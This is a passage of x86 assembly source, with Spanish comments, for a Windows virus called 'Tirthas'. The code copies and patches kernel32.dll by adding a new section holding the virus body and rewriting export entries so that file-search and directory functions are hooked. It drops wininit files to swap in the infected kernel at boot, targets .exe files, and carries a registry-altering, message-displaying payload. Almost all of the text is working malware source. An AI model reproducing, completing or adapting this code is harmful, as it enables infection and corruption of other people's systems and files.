db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,6bh,65h,72h,6eh
|
|
db 65h,6ch,33h,32h,2eh,64h,6ch,6ch
|
|
db 0,6bh,65h,72h,6eh,65h,6ch,33h
|
|
db 32h,2eh,64h,6ch,5fh,0,63h,3ah
|
|
db 5ch,77h,69h,6eh,73h,79h,73h,31h
|
|
db 2eh,6bh,65h,72h,0,0,0,0
|
|
db 0b8h,8h,0,8eh,0d8h,8eh,0c0h,0b8h
|
|
db 2h,3dh,0bah,7eh,0,0cdh,21h,8bh
|
|
db 0d8h,33h,0f6h,0b4h,3fh,0b9h,64h,0
|
|
db 0bah,0,0,0cdh,21h,0b4h,3eh,0cdh
|
|
db 21h,0b4h,3bh,0bah,0,0,0cdh,21h
|
|
db 0b4h,4eh,0bah,71h,0,33h,0c9h,0cdh
|
|
db 21h,72h,11h,0bah,64h,0,0b4h,041h
|
|
db 0cdh,21h,0bah,71h,0,0bfh,64h,0
|
|
db 0b4h,56h,0cdh,21h,0b8h,0,4ch,0cdh,21h
|
|
|
|
New_wininit_end label byte
|
|
|
|
;----------------------------------------------------------------------
|
|
; COMPRUEBA SE EL KERNEL ESTA INFECTADO
|
|
;----------------------------------------------------------------------
|
|
; Para comprobar si el kernel esta infectado, se llama a la funcion
|
|
; SetCurrentDirectoryA con el valor 7BFh en ECX. Si la funcion devuelve
|
|
; en ECX el valor 7C7h significa que el kernel esta infectado.
|
|
;----------------------------------------------------------------------
|
|
|
|
Test_KERNEL:
|
|
|
|
mov ecx,7BFh
|
|
call [ebp+A_SetCurrentDirectoryA]
|
|
|
|
cmp ecx,7C7h
|
|
je Generalt_exit
|
|
|
|
;----------------------------------------------------------------------
|
|
; Buscar el directorio WINDOWS Y SYSTEM
|
|
;----------------------------------------------------------------------
|
|
|
|
lea eax,[ebp+Windows_path]
|
|
|
|
push 0c8h
|
|
push eax
|
|
call [ebp+A_GetWindowsDirectory]
|
|
|
|
lea eax,[ebp+System_path]
|
|
|
|
push 0c8h
|
|
push eax
|
|
call [ebp+A_GetSystemDirectoryA]
|
|
|
|
mov ecx,7BFh
|
|
lea eax,[ebp+System_path] ;Lo establezemos como
|
|
push eax ;directorio actual
|
|
call [ebp+A_SetCurrentDirectoryA]
|
|
|
|
;----------------------------------------------------------------------
|
|
; VER SI EXISTE KERNEL32.DL_
|
|
;----------------------------------------------------------------------
|
|
|
|
mov byte ptr [ebp+Flag_fuction_Find_File],0
|
|
call Fuction_Find_first_file
|
|
|
|
inc eax
|
|
jne Generalt_exit
|
|
dec eax
|
|
|
|
;----------------------------------------------------------------------
|
|
; COPIA KERNEL32.DLL A KERNEL32.DL_
|
|
;----------------------------------------------------------------------
|
|
|
|
lea ebx,[ebp+offset Kernel32] ;kernel32.dll
|
|
lea eax,[ebp+offset Kernel32backup] ;kernel32.dl_
|
|
push 1
|
|
push eax
|
|
push ebx
|
|
call [ebp+A_CopyFileA]
|
|
|
|
mov byte ptr [ebp+Flag_fuction_Find_File],0
|
|
call Fuction_Find_first_file
|
|
|
|
inc eax
|
|
je New_Wininit
|
|
dec eax
|
|
|
|
mov ecx,Tirthas_size
|
|
add dword ptr [ebp+FSizeL],ecx
|
|
mov byte ptr [ebp+Flag_open_kernel],1
|
|
jmp Open_file
|
|
|
|
Header_kernel: ;Base_file = base de kernel32.dl_
|
|
|
|
mov eax,[eax+3ch]
|
|
add eax,dword ptr [ebp+Base_fichero] ;EAX = PE header
|
|
mov dword ptr [ebp+Address_PEheader],eax
|
|
|
|
movzx ebx,word ptr [eax+6h]
|
|
mov dword ptr [ebp+Number_section],ebx
|
|
|
|
movzx ebx,word ptr [eax+14h]
|
|
mov dword ptr [ebp+Size_optional_header],ebx
|
|
|
|
mov ebx,dword ptr [eax+38h]
|
|
mov dword ptr [ebp+Section_alignment],ebx
|
|
|
|
mov ebx,dword ptr [eax+3ch]
|
|
mov dword ptr [ebp+File_alignment],ebx
|
|
|
|
;----------------------------------------------------------------------
|
|
; OBTENER LA ULTIMA SECCION DEL KERNEL
|
|
;----------------------------------------------------------------------
|
|
|
|
mov ebx,dword ptr [eax+74h]
|
|
xor eax,eax
|
|
mov eax,8
|
|
mul ebx
|
|
mov edi,eax ;EDI = Nø directorios * tama¤o
|
|
|
|
mov ebx,dword ptr [ebp+Number_section]
|
|
dec ebx
|
|
mov eax,28h
|
|
mul ebx ;EAX = Nø de seccion * tama¤o
|
|
|
|
add edi,eax
|
|
add edi,dword ptr [ebp+Address_PEheader]
|
|
add edi,78h ;EDI = Ultima seccion del kernel
|
|
|
|
mov dword ptr [ebp+Address_Last_section],edi
|
|
|
|
;----------------------------------------------------------------------
|
|
; RELLENAR LA CABECERA DE LA NUEVA SECCION
|
|
;----------------------------------------------------------------------
|
|
|
|
mov esi,dword ptr [edi+14h]
|
|
mov ebx,dword ptr [edi+10h]
|
|
add esi,ebx
|
|
|
|
xor edx,edx
|
|
mov edi,dword ptr [ebp+File_alignment]
|
|
mov eax,esi
|
|
div edi
|
|
inc eax
|
|
mul edi
|
|
|
|
mov dword ptr [ebp+Pointer_to_raw_data],eax
|
|
|
|
mov eax,dword ptr [ebp+Address_Last_section]
|
|
|
|
mov esi,dword ptr [eax+0ch]
|
|
mov ebx,dword ptr [eax+8h]
|
|
add esi,ebx
|
|
|
|
xor edx,edx
|
|
mov edi,dword ptr [ebp+Section_alignment]
|
|
mov eax,esi
|
|
div edi
|
|
inc eax
|
|
mul edi
|
|
|
|
mov dword ptr [ebp+Virtual_address],eax
|
|
|
|
xor edx,edx
|
|
mov ecx,Tirthas_size
|
|
add ecx,1000h
|
|
mov edi,dword ptr [ebp+Section_alignment]
|
|
mov eax,ecx
|
|
div edi
|
|
inc eax
|
|
mul edi
|
|
|
|
mov dword ptr [ebp+Virtual_size],eax
|
|
|
|
mov edi,dword ptr [ebp+File_alignment]
|
|
mov eax,ecx
|
|
xor edx,edx
|
|
div edi
|
|
inc eax
|
|
mul edi
|
|
|
|
mov dword ptr [ebp+Size_of_raw_data],eax
|
|
|
|
;----------------------------------------------------------------------
|
|
; NUEVO SIZE OF IMAGE
|
|
;----------------------------------------------------------------------
|
|
|
|
mov edi,dword ptr [ebp+Section_alignment]
|
|
mov eax,dword ptr [ebp+Address_PEheader]
|
|
|
|
xor edx,edx
|
|
mov eax,dword ptr [eax+50h]
|
|
add eax,ecx
|
|
div edi
|
|
inc eax
|
|
mul edi
|
|
|
|
mov ebx,dword ptr [ebp+Address_PEheader]
|
|
mov dword ptr [ebx+50h],eax
|
|
|
|
;----------------------------------------------------------------------
|
|
; INCREMENTAR EL NUMERO DE SECCIONES
|
|
;----------------------------------------------------------------------
|
|
|
|
mov ax,word ptr [ebx+6h]
|
|
inc ax
|
|
mov word ptr [ebx+6h],ax
|
|
|
|
;----------------------------------------------------------------------
|
|
; COPIAR LA CABECERA DE LA NUEVA SECCION
|
|
;----------------------------------------------------------------------
|
|
|
|
mov edi,dword ptr [ebp+Address_Last_section]
|
|
add edi,28h
|
|
|
|
cld
|
|
lea esi,[ebp+Tirthas_section]
|
|
mov ecx,28h
|
|
rep movsb
|
|
|
|
;----------------------------------------------------------------------
|
|
; INFECTAR EL KERNEL
|
|
;----------------------------------------------------------------------
|
|
|
|
mov byte ptr [ebp+Flag_open_kernel],0
|
|
|
|
cld
|
|
lea esi,[ebp+Tirthas_start]
|
|
mov ecx,Tirthas_size
|
|
mov edi,dword ptr [ebp+Pointer_to_raw_data]
|
|
add edi,dword ptr [ebp+Base_fichero]
|
|
rep movsb
|
|
|
|
mov byte ptr [ebp+Flag_open_kernel],1
|
|
|
|
;----------------------------------------------------------------------
|
|
; BUSQUEDA DE LA SECCION DE EXPORTACIONES
|
|
;----------------------------------------------------------------------
|
|
|
|
mov eax,dword ptr [ebp+Address_PEheader]
|
|
add eax,dword ptr [ebp+Size_optional_header]
|
|
add eax,18h
|
|
|
|
Search_E_data:
|
|
|
|
cmp dword ptr [eax],'ade.'
|
|
je E_data_header
|
|
|
|
add eax,28h
|
|
jmp Search_E_data
|
|
|
|
E_data_header:
|
|
|
|
mov edi,dword ptr [eax+14h]
|
|
mov dword ptr [ebp+Pointer_to_raw_data_export],edi
|
|
|
|
;----------------------------------------------------------------------
|
|
; CALCULAR LA CONSTANTE DE SECCION
|
|
;----------------------------------------------------------------------
|
|
|
|
mov ebx,dword ptr [eax+0ch] ;Virtual address
|
|
sub ebx,edi
|
|
mov dword ptr [ebp+Constante_seccion],ebx
|
|
|
|
;----------------------------------------------------------------------
|
|
; MODIFICAR LA SECCION DE EXPORTACIONES
|
|
;----------------------------------------------------------------------
|
|
|
|
call calc_RVA
|
|
|
|
mov eax,dword ptr [ebp+Pointer_to_raw_data_export]
|
|
add eax,dword ptr [ebp+Base_fichero] ;EAX = Edata
|
|
|
|
mov eax,dword ptr [eax+1ch]
|
|
add eax,dword ptr [ebp+Base_fichero]
|
|
sub eax,dword ptr [ebp+Constante_seccion] ;EAX = Address of fuction
|
|
|
|
mov ecx,dword ptr [ebp+Ordinal_funcion_1] ;Ordinal
|
|
rol ecx,2
|
|
add eax,ecx ;Direccion de la RVA...
|
|
|
|
mov edi,dword ptr [ebp+Datos_0]
|
|
mov dword ptr [eax],edi ;Cambiamos el offset
|
|
|
|
;----------------------------------------------------------------------
|
|
; CIERRE DEL KERNEL
|
|
;----------------------------------------------------------------------
|
|
|
|
jmp Close_mapping
|
|
|
|
New_Wininit:
|
|
|
|
mov byte ptr [ebp+Flag_open_kernel],0
|
|
|
|
;----------------------------------------------------------------------
|
|
; CREAR WININIT.EXE
|
|
;----------------------------------------------------------------------
|
|
|
|
mov ecx,7BFh
|
|
lea eax,[ebp+Windows_path]
|
|
push eax
|
|
call [ebp+A_SetCurrentDirectoryA]
|
|
|
|
Create_wininit:
|
|
|
|
push 0
|
|
push 0
|
|
push 2
|
|
push 0
|
|
push 1
|
|
push 0c0000000h
|
|
lea eax,[ebp+File_Wininit]
|
|
push eax
|
|
call [ebp+A_CreateFileA]
|
|
|
|
inc eax
|
|
je Generalt_exit
|
|
dec eax
|
|
|
|
mov dword ptr [ebp+Handle_wininit],eax
|
|
|
|
lea esi,[ebp+Bytes_wininit]
|
|
mov ecx,Wininit_size
|
|
lea edx,[ebp+New_wininit_start]
|
|
|
|
push 0
|
|
push esi
|
|
push ecx
|
|
push edx
|
|
push eax
|
|
call [ebp+A_WriteFile]
|
|
|
|
push dword ptr [ebp+Handle_wininit]
|
|
call [ebp+A_CloseHandle]
|
|
|
|
;----------------------------------------------------------------------
|
|
; CREAR WINSYSTEM.KER
|
|
;----------------------------------------------------------------------
|
|
|
|
push 0
|
|
push 0
|
|
push 2
|
|
push 0
|
|
push 1
|
|
push 0c0000000h
|
|
lea eax,[ebp+File_System_addr]
|
|
push eax
|
|
call [ebp+A_CreateFileA]
|
|
|
|
inc eax
|
|
je Generalt_exit
|
|
dec eax
|
|
|
|
mov dword ptr [ebp+Handle_winsystem],eax
|
|
|
|
lea esi,[ebp+Bytes_wininit]
|
|
mov ecx,0c8h
|
|
lea edx,[ebp+System_path]
|
|
|
|
push 0
|
|
push esi
|
|
push ecx
|
|
push edx
|
|
push eax
|
|
call [ebp+A_WriteFile]
|
|
|
|
push dword ptr [ebp+Handle_winsystem]
|
|
call [ebp+A_CloseHandle]
|
|
|
|
;----------------------------------------------------------------------
|
|
; CREAR WININIT.INI
|
|
;----------------------------------------------------------------------
|
|
|
|
push 0
|
|
push 0
|
|
push 2
|
|
push 0
|
|
push 1
|
|
push 0c0000000h
|
|
lea eax,[ebp+File_Wininit_ini]
|
|
push eax
|
|
call [ebp+A_CreateFileA]
|
|
|
|
inc eax
|
|
je Generalt_exit
|
|
dec eax
|
|
|
|
push eax
|
|
call [ebp+A_CloseHandle]
|
|
|
|
|
|
;----------------------------------------------------------------------
|
|
; SALIDA
|
|
;----------------------------------------------------------------------
|
|
|
|
Generalt_exit:
|
|
|
|
cmp ebp,0
|
|
je First_exit
|
|
|
|
mov eax,dword ptr [ebp+Image_base]
|
|
add eax,dword ptr [ebp+Old_entry_point]
|
|
|
|
jmp eax
|
|
|
|
First_exit:
|
|
|
|
push 0
|
|
call [ebp+A_ExitProcess]
|
|
|
|
;----------------------------------------------------------------------------
|
|
; AREA DE DATOS
|
|
;----------------------------------------------------------------------------
|
|
|
|
Tirthas_size equ (offset Tirthas_end-offset Tirthas_start)
|
|
SetCurrentDirectoryA_size equ (offset SetCurrentDirectoryA-offset Tirthas_start)
|
|
Wininit_size equ (offset New_wininit_end-offset New_wininit_start)
|
|
|
|
Base_kernel dd 0
|
|
Base_fichero dd 0
|
|
Handle_windows dd 0
|
|
Handle_find_files dd 0
|
|
Handle_createfile dd 0
|
|
Handle_createfilemap dd 0
|
|
Handle_kernel32 dd 0
|
|
Handle_wininit dd 0
|
|
Handle_winsystem dd 0
|
|
Handle_wininit_ini dd 0
|
|
|
|
New_entry_point dd 0
|
|
Old_entry_point dd 0
|
|
|
|
Number_section dd 0
|
|
Size_optional_header dd 0
|
|
Virtual_address_LS dd 0
|
|
Virtual_size_LS dd 0
|
|
Pointer_to_raw_data_LS dd 0
|
|
Address_Last_section dd 0
|
|
Section_alignment dd 0
|
|
File_alignment dd 0
|
|
Address_export_table dd 0
|
|
|
|
Old_SEH dd 0
|
|
Bytes_wininit dd 0
|
|
|
|
Files_exe db '*.exe',0
|
|
Files_cho db '*.cho',0
|
|
Path_in_fuction db 0c8h dup (0)
|
|
File_Wininit db 'wininit.exe',0
|
|
File_Wininit_ini db 'wininit.ini',0
|
|
File_System_addr db 'c:\winsys1.ker',0
|
|
File_USER32 db 'user32.dll',0
|
|
File_ADVAPI32 db 'advapi32.dll',0
|
|
File_GDI32 db 'gdi32.dll',0
|
|
Kernel32backup db 'kernel32.dl_',0
|
|
Kernel32 db 'Kernel32.dll',0
|
|
|
|
System_path db 0c8h dup (0)
|
|
Windows_path db 0c8h dup (0)
|
|
|
|
Address_PEheader dd 0
|
|
Image_base dd 0
|
|
|
|
Numero_payload db 0
|
|
Flag_numero db 0 ;--> Evita aumentar de tama¤o si el
|
|
Flag_funciones db 0 ; archivo no es apto.
|
|
Flag_infection_by_fuction db 0
|
|
Flag_fuction_Find_File db 0
|
|
Flag_open_kernel db 0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; FUNCIONES INTERCEPTADAS
|
|
;--------------------------------------------------------------------------
|
|
Return_address dd 0
|
|
Return_address_in_virus dd 0
|
|
File_search dd 0
|
|
Struc_search dd 0
|
|
Handle_Find_next dd 0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; REGISTROS
|
|
;--------------------------------------------------------------------------
|
|
EAX_seg dd 0
|
|
EBX_seg dd 0
|
|
ECX_seg dd 0
|
|
EDX_seg dd 0
|
|
ESI_seg dd 0
|
|
EDI_seg dd 0
|
|
EBP_seg dd 0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; REGISTRO DE WINDOWS
|
|
;--------------------------------------------------------------------------
|
|
Clave_Accessibility db 'Control Panel\Accessibility\HighContrast',0
|
|
Nombre_clave db 'Enabled',0
|
|
Handle_registro dd 0
|
|
Valor db 1
|
|
|
|
;--------------------------------------------------------------------------
|
|
; ORDINALES DE LAS FUNCIONES PARCHEADAS
|
|
;--------------------------------------------------------------------------
|
|
Ordinal_funcion_1 dd 0 ;SetCurrentDirectoryA
|
|
Ordinal_funcion_2 dd 0 ;FindFirstFileA
|
|
Ordinal_funcion_3 dd 0 ;FindNextFileA
|
|
|
|
;--------------------------------------------------------------------------
|
|
; NUEVA SECCION
|
|
;--------------------------------------------------------------------------
|
|
Tirthas_section:
|
|
Name_section db '.Tirthas'
|
|
Virtual_size dd 0
|
|
Virtual_address dd 0
|
|
Size_of_raw_data dd 0
|
|
Pointer_to_raw_data dd 0
|
|
Pointer_to_relocations dd 0
|
|
Pointer_to_line_numbers dd 0
|
|
Number_of_relocations dw 0
|
|
Number_of_line_numbers dw 0
|
|
Attributes_section dd 0E0000020h
|
|
|
|
;--------------------------------------------------------------------------
|
|
; SECCION DE EXPORTACIONES
|
|
;--------------------------------------------------------------------------
|
|
Constante_seccion dd 0
|
|
Pointer_to_raw_data_export dd 0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; ULTIMA SECCION DEL KERNEL
|
|
;--------------------------------------------------------------------------
|
|
Virtual_size_LS_K32 dd 0
|
|
Virtual_address_LS_K32 dd 0
|
|
Size_of_raw_data_LS_K32 dd 0
|
|
Pointer_to_raw_data_LS_K32 dd 0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; GetProcAddress
|
|
;--------------------------------------------------------------------------
|
|
T_GetProcAddress db 'GetProcAddress',0
|
|
A_GetProcAddress dd 0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; API's necesarias:
|
|
;--------------------------------------------------------------------------
|
|
; KERNEL32.DLL
|
|
;--------------------------------------------------------------------------
|
|
|
|
Fuction_list_1:
|
|
T_ExitProcess db 'ExitProcess',0
|
|
T_FindFirstFileA db 'FindFirstFileA',0
|
|
T_FindNextFileA db 'FindNextFileA',0
|
|
T_SetCurrentDirectoryA db 'SetCurrentDirectoryA',0
|
|
T_GetSystemTime db 'GetSystemTime',0
|
|
T_GetWindowsDirectory db 'GetWindowsDirectoryA',0
|
|
T_CreateFileA db 'CreateFileA',0
|
|
T_CloseHandle db 'CloseHandle',0
|
|
T_UnmapViewOfFile db 'UnmapViewOfFile',0
|
|
T_MapViewOfFile db 'MapViewOfFile',0
|
|
T_CreateFileMappingA db 'CreateFileMappingA',0
|
|
T_LoadLibraryA db 'LoadLibraryA',0
|
|
T_WriteFile db 'WriteFile',0
|
|
T_GetSystemDirectoryA db 'GetSystemDirectoryA',0
|
|
T_CreateThread db 'CreateThread',0
|
|
T_CopyFileA db 'CopyFileA',0
|
|
T_WriteProcessMemory db 'WriteProcessMemory',0
|
|
T_GetCurrentProcess db 'GetCurrentProcess',0
|
|
T_VirtualProtect db 'VirtualProtect',0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; API's necesarias:
|
|
;--------------------------------------------------------------------------
|
|
; ADVAPI32.DLL
|
|
;--------------------------------------------------------------------------
|
|
|
|
Fuction_list_2:
|
|
T_RegOpenKeyExA db 'RegOpenKeyExA',0
|
|
T_RegCloseKey db 'RegCloseKey',0
|
|
T_RegSetValueExA db 'RegSetValueExA',0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; API's necesarias:
|
|
;--------------------------------------------------------------------------
|
|
; USER32.DLL
|
|
;--------------------------------------------------------------------------
|
|
|
|
Fuction_list_3:
|
|
T_MessageBoxA db 'MessageBoxA',0
|
|
T_RegisterClassA db 'RegisterClassA',0
|
|
T_CreateWindowExA db 'CreateWindowExA',0
|
|
T_ShowWindow db 'ShowWindow',0
|
|
T_GetDC db 'GetDC',0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; API's necesarias:
|
|
;--------------------------------------------------------------------------
|
|
; GDI32.DLL
|
|
;--------------------------------------------------------------------------
|
|
|
|
Fuction_list_4:
|
|
T_TextOutA db 'TextOutA',0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; DIRECCIONES DE LAS API'S
|
|
;--------------------------------------------------------------------------
|
|
; KERNEL32.DLL
|
|
;--------------------------------------------------------------------------
|
|
|
|
Address_list_1:
|
|
A_ExitProcess dd 0
|
|
A_FindFirstFileA dd 0
|
|
A_FindNextFileA dd 0
|
|
A_SetCurrentDirectoryA dd 0
|
|
A_GetSystemTime dd 0
|
|
A_GetWindowsDirectory dd 0
|
|
A_CreateFileA dd 0
|
|
A_CloseHandle dd 0
|
|
A_UnmapViewOfFile dd 0
|
|
A_MapViewOfFile dd 0
|
|
A_CreateFileMappingA dd 0
|
|
A_LoadLibraryA dd 0
|
|
A_WriteFile dd 0
|
|
A_GetSystemDirectoryA dd 0
|
|
A_CreateThread dd 0
|
|
A_CopyFileA dd 0
|
|
A_WriteProcessMemory dd 0
|
|
A_GetCurrentProcess dd 0
|
|
A_VirtualProtect dd 0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; DIRECCIONES DE LAS API'S
|
|
;--------------------------------------------------------------------------
|
|
; ADVAPI32.DLL
|
|
;--------------------------------------------------------------------------
|
|
|
|
Address_list_2:
|
|
A_RegOpenKeyExA dd 0
|
|
A_RegCloseKey dd 0
|
|
A_RegSetValueExA dd 0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; DIRECCIONES DE LAS API'S
|
|
;--------------------------------------------------------------------------
|
|
; USE32.DLL
|
|
;--------------------------------------------------------------------------
|
|
|
|
Address_list_3:
|
|
A_MessageBoxA dd 0
|
|
A_RegisterClassA dd 0
|
|
A_CreateWindowExA dd 0
|
|
A_ShowWindow dd 0
|
|
A_GetDC dd 0
|
|
|
|
;--------------------------------------------------------------------------
|
|
; DIRECCIONES DE LAS API'S
|
|
;--------------------------------------------------------------------------
|
|
; GDI32.DLL
|
|
;--------------------------------------------------------------------------
|
|
|
|
Address_list_4:
|
|
A_TextOutA dd 0
|
|
|
|
;---------------------------------------------------------------------------
|
|
; ESTRUCTURAS
|
|
;---------------------------------------------------------------------------
|
|
|
|
Inftime STRUC
|
|
LowDate DD ?
|
|
HighDate DD ?
|
|
Inftime ENDS
|
|
|
|
Info_file label byte
|
|
Attributes dd 0
|
|
CTime Inftime ?
|
|
LAccess Inftime ?
|
|
LWrite Inftime ?
|
|
FSizeH dd 0
|
|
FSizeL dd 0
|
|
Reservado1 dd 0
|
|
Reservado2 dd 0
|
|
FileName db 104h DUP (0)
|
|
Division db 16 DUP (0)
|
|
|
|
date_system label byte
|
|
Year dw 0
|
|
Month dw 0
|
|
DayOfWeek dw 0
|
|
Day dw 0
|
|
Hour dw 0
|
|
Minute dw 0
|
|
Second dw 0
|
|
Milliseconds dw 0
|
|
|
|
Windows_class label byte
|
|
Style dd 1000h
|
|
WndProc dd 0
|
|
ClsExtra dd 0
|
|
WndExtra dd 0
|
|
HandleInstance dd 0
|
|
HandleIcon dd 0
|
|
HandleCursor dd 0
|
|
HbrBackground dd 3
|
|
MenuName dd 0
|
|
ClassName dd offset Name_class
|
|
|
|
Title_Windows db "Kernel32",0
|
|
Name_class db "System32",0
|
|
Texto db " You are foul ",0
|
|
|
|
Tirthas_end label byte
|
|
end Tirthas
|